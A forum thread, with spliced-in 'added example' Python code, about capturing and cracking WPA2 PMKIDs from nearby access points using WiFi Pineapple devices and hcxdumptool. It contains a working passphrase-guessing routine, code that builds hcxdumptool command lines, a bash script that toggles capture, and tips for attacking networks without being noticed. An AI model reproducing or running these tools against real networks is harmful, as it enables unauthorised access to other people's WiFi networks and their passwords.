PMKID Attack on WiFi Pineapples


Zylla

1 hour ago, g0blin said:

Sorry @Zylla - scratch that. It does appear to be working, but I may need to adjust how I'm parsing the logs in order to marry up captures with APs. Stand down!

Phew. I know the last update from ZerBea fixed some bugs with direct probe-request handling, so I got worried something was wrong on my part.
Glad to hear everything's good!


18 hours ago, Zylla said:

Kali is based on Debian; the only "modified versions" I can think of are the images you can download containing the Nexmon patches, which let you run wlan0 in monitor mode (and AP mode at the same time).

But that's just a kernel patch.

Here's a link to a great version: https://re4son-kernel.com/re4son-pi-kernel/

And yeah, same with the Pineapple. You don't use hashcat on these devices to crack the PMKID; you transfer the captures from the device to your desktop, which hopefully has a GPU or something.

Yes, the one I have on my RP3b+ is an image version. The link you sent me doesn't seem to be an image file. I'm going to do some reading up on how to install it.

Have you tried getting PMKID on Raspbian?

thank you!
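Added worked example (not from this thread and not part of the hcx tools): what the desktop side of the workflow Zylla describes actually computes. It parses one hcxpcaptool 16800 line (pmkid*ap_mac*sta_mac*essid_hex), derives the WPA2-PSK PMK with PBKDF2-HMAC-SHA1 (4096 rounds, 32 bytes) and recomputes PMKID = HMAC-SHA1-128(PMK, "PMK Name" || AP MAC || STA MAC), which is the per-candidate check hashcat mode 16800 runs. The ESSID, MAC addresses and passphrase in the sample line are constructed, not captured data.

```python
import hashlib
import hmac

# Added example, not code from the thread. Recompute a PMKID from a candidate
# passphrase the way hashcat mode 16800 does and compare it with the value in a
# captured hcxpcaptool line of the form  pmkid*ap_mac*sta_mac*essid_hex.


def wpa2_pmk(passphrase: str, essid: bytes) -> bytes:
    """WPA2-PSK: PMK = PBKDF2-HMAC-SHA1(passphrase, ESSID, 4096 iterations, 32 bytes)."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), essid, 4096, 32)


def pmkid(pmk: bytes, ap_mac: bytes, sta_mac: bytes) -> bytes:
    """802.11 PMKID = HMAC-SHA1-128(PMK, "PMK Name" || AP MAC || STA MAC)."""
    return hmac.new(pmk, b"PMK Name" + ap_mac + sta_mac, hashlib.sha1).digest()[:16]


def parse_16800(line: str):
    """Split one hashcat 16800 line into (pmkid, ap_mac, sta_mac, essid) as bytes."""
    fields = line.strip().split("*")
    if len(fields) != 4:
        raise ValueError("expected 4 '*'-separated fields: %r" % line)
    return tuple(bytes.fromhex(f) for f in fields)


def build_16800(passphrase: str, essid: bytes, ap_mac: bytes, sta_mac: bytes) -> str:
    """Construct a 16800 line for a known passphrase (used here only to build sample input)."""
    p = pmkid(wpa2_pmk(passphrase, essid), ap_mac, sta_mac)
    return "*".join(x.hex() for x in (p, ap_mac, sta_mac, essid))


def try_wordlist(line: str, candidates):
    """Return the first candidate whose recomputed PMKID matches the captured one, else None."""
    captured, ap_mac, sta_mac, essid = parse_16800(line)
    for pw in candidates:
        if hmac.compare_digest(pmkid(wpa2_pmk(pw, essid), ap_mac, sta_mac), captured):
            return pw
    return None


# Constructed sample: made-up ESSID "TestAP", made-up MACs and a made-up passphrase.
SAMPLE_LINE = build_16800(
    "correct horse",
    b"TestAP",
    bytes.fromhex("001122334455"),
    bytes.fromhex("66778899aabb"),
)

if __name__ == "__main__":
    print(SAMPLE_LINE)
    print(try_wordlist(SAMPLE_LINE, ["password", "letmein", "correct horse"]))
```

Each candidate costs a full 4096-round PBKDF2, which CPython runs serially at a few hundred candidates per second at best; that is why the captures go to hashcat on a GPU rather than being cracked on the Pineapple. The script is for understanding and sanity-checking a single 16800 line, not for wordlist runs.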


9 hours ago, cheeto said:

Yes, the one I have on my RP3b+ is an image version. The link you sent me doesn't seem to be an image file. I'm going to do some reading up on how to install it.

Have you tried getting PMKID on Raspbian?

thank you!

Haven't tested it, but since Raspbian is also based on Debian I don't see any reason for it not to work if you have all the dependencies installed. But you would need to patch the kernel to get monitor mode on wlan0.


3 minutes ago, kbeflo said:

@Zylla, @g0blin, is there a way to whitelist access points from getting deauth by hcxdumptool? For example the Pineapple's mgmt ap and controller.

Hi @kbeflo, you can whitelist with the filters from the CLI - I haven't used whitelist/protection mode but have tried blacklist/target mode and it works well.

--filterlist=<file>                : mac filter list
                                     format: 112233445566 + comment
                                     maximum line lenght 128, maximum entries 32
--filtermode=<digit>               : mode for filter list
                                     1: use filter list as protection list (default)
                                     2: use filter list as target list
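
Added example (not hcxdumptool's own code): generating a --filterlist file in the format from the help text above, validating the MAC entries against the 32-entry and 128-character limits it states, and building the matching hcxdumptool command line with --filtermode=1 so the listed Pineapple APs are protected rather than targeted. The MAC addresses are made up; whether hcxdumptool accepts upper-case hex is not stated on this page, so the code normalises to lower-case digits as an assumption.

```python
import re

# Added example, not part of the thread or of hcxdumptool. Builds a protection
# list for hcxdumptool --filterlist / --filtermode=1 (the "never deauth these" mode).

MAX_ENTRIES = 32   # limit stated in hcxdumptool's help text
MAX_LINE = 128     # limit stated in hcxdumptool's help text


def normalise_mac(mac: str) -> str:
    """Accept 00:11:22:33:44:55, 00-11-22-33-44-55 or 001122334455; return 12 lower-case hex digits.
    Lower-case output is an assumption; the help text only shows digits."""
    digits = re.sub(r"[:\-\s]", "", mac).lower()
    if not re.fullmatch(r"[0-9a-f]{12}", digits):
        raise ValueError("bad MAC address: %r" % mac)
    return digits


def build_filterlist(entries) -> str:
    """entries: iterable of (mac, comment). Returns the file text, one '112233445566 comment' per line."""
    lines = []
    for mac, comment in entries:
        line = normalise_mac(mac)
        if comment.strip():
            line += " " + comment.strip()
        if len(line) > MAX_LINE:
            raise ValueError("filter line longer than %d characters: %r" % (MAX_LINE, line))
        lines.append(line)
    if len(lines) > MAX_ENTRIES:
        raise ValueError("hcxdumptool accepts at most %d filter entries" % MAX_ENTRIES)
    return "\n".join(lines) + "\n"


def hcxdumptool_argv(interface: str, listpath: str, protect: bool = True,
                     outfile: str = "capture.pcapng"):
    """Command line for hcxdumptool: mode 1 = protection list, mode 2 = target list."""
    return [
        "hcxdumptool", "-i", interface, "-o", outfile,
        "--enable_status=3",
        "--filterlist=%s" % listpath,
        "--filtermode=%d" % (1 if protect else 2),
    ]


# Constructed sample: two made-up BSSIDs standing in for the Pineapple's own APs.
PROTECT = [
    ("00:13:37:A1:B2:C3", "Pineapple management AP"),
    ("001337a1b2c4", "Pineapple open AP"),
]

if __name__ == "__main__":
    text = build_filterlist(PROTECT)
    with open("/tmp/protect.txt", "w") as fh:
        fh.write(text)
    print(text, end="")
    print(" ".join(hcxdumptool_argv("wlan1mon", "/tmp/protect.txt")))
```

Run it once to write the list, then start hcxdumptool with the printed command; with --filtermode=1 every BSSID in the file is left alone and everything else is still attacked, which is the "protect the management AP, target all others" case raised later in the thread.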

 


I've updated the module to 0.2, this includes a few new features.

* Scan for APs using airodump, instead of relying upon output of hcxdumptool to discover APs
* Provide "inclusion" list in order to target specific APs (there you go @Just_a_User!)
* Retain various pieces of scan data, including the capture, log and AP list from scans
* Improved dependency script (thanks @Zylla!)

I've a bit of cleaning up to do, as it's gotten a little out of hand. I'd like to unify the API methods for loading scan/capture data, as well as get myself up to speed on Angular so that I can use its features a bit more optimally, but for the moment the module should work as intended.


46 minutes ago, g0blin said:

* Provide "inclusion" list in order to target specific APs (there you go

That's great, thank you. There may be occasions where the inverse is required: protecting the Pineapple's management AP and targeting all others.

Any chance you can make the inclusion target or exclusion protection modes switchable by user? if not no worries.

I will give this a test drive later for sure. thank you for the contribution

EDIT - I just installed it; the targeted mode allows you to avoid your management network, so no need. This is great! Thanks again.

EDIT EDIT - I get an error on converting.

[Screenshots of the conversion error: Selection_032.png, Selection_033.png, Selection_034.png]


D'oh - sorry! I'll get on fixing that after this morning's round of meetings!

edit: Hmm, I tried to convert a saved capture from yesterday and it appeared to work. I'm at work and only have 5 GHz networks here, so will need to investigate further when I get home this evening.

As for inverting the inclusion rule, that's something I can cover off this evening also.


2 hours ago, g0blin said:

As for inverting the inclusion rule, that's something I can cover off this evening also. 

Super nice. Finishing touches (for me at least) would be a delete button for the selected log and maybe a download of the converted file - next to load and convert.

It could be that the download happens after the convert? If so, that's great. I just can't see that yet with my error.

I have to factory reset my Tetra soon as I have been messing a lot with libs recently, so I might be causing this issue myself.

EDIT - I just managed a conversion, which does indeed pop up as a download. I can repeat the error on one log file, so it's something in there. I will have a better poke about and report back.


25 minutes ago, Just_a_User said:

Super nice. Finishing touches (for me at least) would be a delete button for the selected log and maybe a download of the converted file - next to load and convert.

It could be that the download happens after the convert? If so, that's great. I just can't see that yet with my error.

I have to factory reset my Tetra soon as I have been messing a lot with libs recently, so I might be causing this issue myself.

Great, thank you for the feedback! I'll try to get these features in this evening, as well as diagnosing the issue you found with downloading the converted results.


14 minutes ago, g0blin said:

Great, thank you for the feedback! I'll try to get these features in this evening, as well as diagnosing the issue you found with downloading the converted results.

I think I might have it (at least in part): I can repeat it if I try to convert an empty log file, so my guess is the log I tried to convert is possibly empty even though it shows up green/pwned.


Interesting! I'll see if I can reproduce it locally. If I can't I may have to ask you to send over any (redacted) logs that you're able to, if you're willing? If not no problem - I can always step through it and try to spot where I've messed up.

Thanks


2 hours ago, g0blin said:

Interesting! I'll see if I can reproduce it locally. If I can't I may have to ask you to send over any (redacted) logs that you're able to, if you're willing? If not no problem - I can always step through it and try to spot where I've messed up.

Thanks

I had removed the logs and files from /tmp/ before i saw your request.

I have since had 2 log files with no marked pwned networks, both targeting my test AP. One converts OK, the other gives JSON errors - the only difference I can see is whether it contains a PMKID or not.

This one gives JSON errors:

root@Pineapple:/pineapple/modules/PMKID/capture# hcxpcaptool -z test.16800 capture_1536756737
start reading from capture_1536756737
                                                
summary:                                        
--------
file name....................: capture_1536756737
file type....................: pcapng 1.0
file hardware information....: mips
file os information..........: Linux 3.18.84
file application information.: hcxdumptool 4.2.1
network type.................: DLT_IEEE802_11_RADIO (127)
endianess....................: big endian
read errors..................: flawless
packets inside...............: 45
skipped packets..............: 0
packets with FCS.............: 45
beacons (with ESSID inside)..: 18
probe requests...............: 2
probe responses..............: 5
authentications (OPEN SYSTEM): 14
authentications (BROADCOM)...: 1
EAPOL packets................: 5
EAPOL PMKIDs.................: 1

0 PMKID(s) written to test.16800
root@Pineapple:/pineapple/modules/PMKID/capture#

This one works fine:

root@Pineapple:/pineapple/modules/PMKID/capture# hcxpcaptool -z test2.16800 capture_1536756628
start reading from capture_1536756628
                                                
summary:                                        
--------
file name....................: capture_1536756628
file type....................: pcapng 1.0
file hardware information....: mips
file os information..........: Linux 3.18.84
file application information.: hcxdumptool 4.2.1
network type.................: DLT_IEEE802_11_RADIO (127)
endianess....................: big endian
read errors..................: flawless
packets inside...............: 48
skipped packets..............: 0
packets with FCS.............: 48
beacons (with ESSID inside)..: 13
probe requests...............: 2
probe responses..............: 4
association requests.........: 3
association responses........: 1
authentications (OPEN SYSTEM): 19
authentications (BROADCOM)...: 2
EAPOL packets................: 5
EAPOL PMKIDs.................: 1

1 PMKID(s) written to test2.16800
root@Pineapple:/pineapple/modules/PMKID/capture# 

I've got to do some stuff so won't be able to look at it again for a few hours. Maybe this gives some clues?

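As an added example (not g0blin's module code), here is how a module backend could read hcxpcaptool's summary and the .16800 file it writes so that the case shown above (EAPOL PMKIDs: 1 but 0 PMKID(s) written, and possibly no output file at all) yields an empty list instead of a JSON error. The summary text and the 16800 line embedded below are constructed from the output shapes in this thread, and treating a missing output file as "no PMKIDs" is an assumption about hcxpcaptool's behaviour rather than something the thread confirms.

```python
import os
import re
import tempfile

# Added example, not the module's own code. Parse hcxpcaptool's stdout summary and
# the .16800 it writes, returning an empty list when nothing was written (or when the
# output file was never created) instead of failing on a missing/empty file.

SUMMARY_RE = re.compile(r"^EAPOL PMKIDs\.+: (\d+)[ \t]*$", re.M)
WRITTEN_RE = re.compile(r"^(\d+) PMKID\(s\) written to (\S+)[ \t]*$", re.M)
# hashcat 16800 line: 32 hex pmkid * 12 hex AP MAC * 12 hex STA MAC * hex-encoded ESSID
LINE_RE = re.compile(r"^[0-9a-f]{32}\*[0-9a-f]{12}\*[0-9a-f]{12}\*[0-9a-f]+$")


def parse_summary(text: str) -> dict:
    """Counts from hcxpcaptool's summary: PMKIDs seen in EAPOL vs. PMKIDs actually written."""
    seen = SUMMARY_RE.search(text)
    written = WRITTEN_RE.search(text)
    return {
        "eapol_pmkids": int(seen.group(1)) if seen else 0,
        "written": int(written.group(1)) if written else 0,
        "outfile": written.group(2) if written else None,
    }


def load_16800(path: str) -> list:
    """Well-formed 16800 lines in `path`; [] if the file is missing or empty (assumed
    hcxpcaptool behaviour when 0 PMKIDs are written)."""
    if not os.path.isfile(path) or os.path.getsize(path) == 0:
        return []
    with open(path) as fh:
        return [l.strip() for l in fh if LINE_RE.match(l.strip())]


def convert_result(summary_text: str, outfile: str) -> dict:
    """What a backend should hand to the UI: always a list (possibly empty) plus the counts,
    so the front end never has to decode a missing file as JSON."""
    info = parse_summary(summary_text)
    info["pmkids"] = load_16800(outfile)
    return info


# Constructed sample, shaped like the hcxpcaptool 4.2.1 output in this thread: one PMKID
# seen inside EAPOL but nothing written to the output file.
SAMPLE_SUMMARY = """\
start reading from capture_1536756737
summary:
--------
EAPOL packets................: 5
EAPOL PMKIDs.................: 1

0 PMKID(s) written to test.16800
"""

# Constructed 16800 line (made-up PMKID and MACs, ESSID "TestAP").
SAMPLE_16800_LINE = (
    "00112233445566778899aabbccddeeff*001122334455*66778899aabb*546573744150"
)


def demo_roundtrip() -> list:
    """Write a two-line .16800 (one valid line, one junk line) to a temp dir and load it back."""
    path = os.path.join(tempfile.mkdtemp(), "demo.16800")
    with open(path, "w") as fh:
        fh.write(SAMPLE_16800_LINE + "\n")
        fh.write("not a pmkid line\n")
    return load_16800(path)


if __name__ == "__main__":
    print(convert_result(SAMPLE_SUMMARY, "/nonexistent/test.16800"))
    print(demo_roundtrip())
```

The two counts are worth surfacing separately in the UI: "EAPOL PMKIDs: 1" with "0 written" is exactly the pattern in the failing log above, and showing both tells the user the capture saw a PMKID that hcxpcaptool then discarded, rather than silently reporting an empty result.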

3 hours ago, Just_a_User said:

I had removed the logs and files from /tmp/ before I saw your request.

I have since had 2 log files with no marked pwned networks, both targeting my test AP. One converts OK, the other gives JSON errors - the only difference I can see is whether it contains a PMKID or not.

Thanks, that gives me plenty to go on! I'm currently packing to move house, so won't be checking this out until later this evening. I'll keep you updated ?

At a guess, if no PMKIDs are written, perhaps the file does not get created. That'd explain why the Pineapple API is complaining about the file being invalid, however I suppose in this case we should at least return an empty file.


14 minutes ago, g0blin said:

Sorry, real life has gotten in the way so a bit behind with the updates. Will try and get some time to work on this tonight ?

Is it possible to have a "save settings" option to remember the command line options for next time? I like to use --disable_deauthentications --disable_disassociations as, correct me if I am wrong, disconnecting clients is not needed to capture PMKIDs and simply leads to being noticed by users.


38 minutes ago, PixL said:

Is it possible to have a "save settings" option to remember the command line options for next time? I like to use --disable_deauthentications --disable_disassociations as, correct me if I am wrong, disconnecting clients is not needed to capture PMKIDs and simply leads to being noticed by users.

Sure thing, I can see about adding that in the next version - nice suggestion!


I have also updated my simple button script so that it stores captured data to /pineapple/modules/PMKID/capture, you can then use g0blin's module to view the data.

#!/bin/bash
# PixL
# Toggle script: the first run starts a PMKID capture with hcxdumptool, the
# second run stops it and moves the results into g0blin's module directory.
flag="/tmp/handshake"
workdir="/tmp"
outdir="/pineapple/modules/PMKID/capture"
capture="$(head -30 /dev/urandom | tr -dc '0123456789' | head -c3)"

mkdir -p "$outdir"

if [ -f "$flag" ]
then
        # Stop the capture and give hcxdumptool a moment to flush the pcapng before converting
        killall hcxdumptool
        sleep 2
        led YELLOW off
        rm -f "$flag"
        # Extract PMKIDs into hashcat 16800 format; keep the conversion summary as .conlog
        hcxpcaptool -z "$workdir/test.16800" "$workdir/test.pcapng" > "$workdir/test.conlog"
        mv "$workdir/test.pcapng" "$outdir/$capture"
        # The .16800 may be absent when 0 PMKIDs were written (see the JSON error discussed above)
        [ -f "$workdir/test.16800" ] && mv "$workdir/test.16800" "$outdir/$capture.16800"
        mv "$workdir/test.conlog" "$outdir/$capture.conlog"
        mv "$workdir/test.log" "$outdir/$capture.log"
else
        touch "$flag"
        led YELLOW on
        # No deauth/disassoc frames are sent: the PMKID comes from the AP's first EAPOL frame, so clients stay connected
        hcxdumptool -o "$workdir/test.pcapng" -t 2 -i wlan1mon --enable_status=3 --disable_deauthentications --disable_disassociations > "$workdir/test.log" &
fi



  • 2 weeks later...

I've been having some trouble installing the ipk files on my NANO. Looks like they may be corrupt or otherwise.

root@Pineapple:/sd# opkg --dest sd install hcxdump*.ipk
Collected errors:
 * deb_extract: hcxdumptool_4.2.1-12_ar71xx.ipk: invalid magic
 * pkg_init_from_file: Failed to extract control file from hcxdumptool_4.2.1-12_ar71xx.ipk.

Is there a version I should try to download and install?

Thanks


13 hours ago, Arch said:

I've been having some trouble installing the ipk files on my NANO. Looks like they may be corrupt or otherwise.

root@Pineapple:/sd# opkg --dest sd install hcxdump*.ipk
Collected errors:
 * deb_extract: hcxdumptool_4.2.1-12_ar71xx.ipk: invalid magic
 * pkg_init_from_file: Failed to extract control file from hcxdumptool_4.2.1-12_ar71xx.ipk.

Is there a version I should try to download and install?

Thanks

The NANO always gives some "errors" when trying to install IPKs, about missing control files etc., which usually can be safely ignored. First try seeing if you can locate the binary on the SD card, and then try to simply launch it.

To locate it, do this: "find /sd -name hcxdumptool"
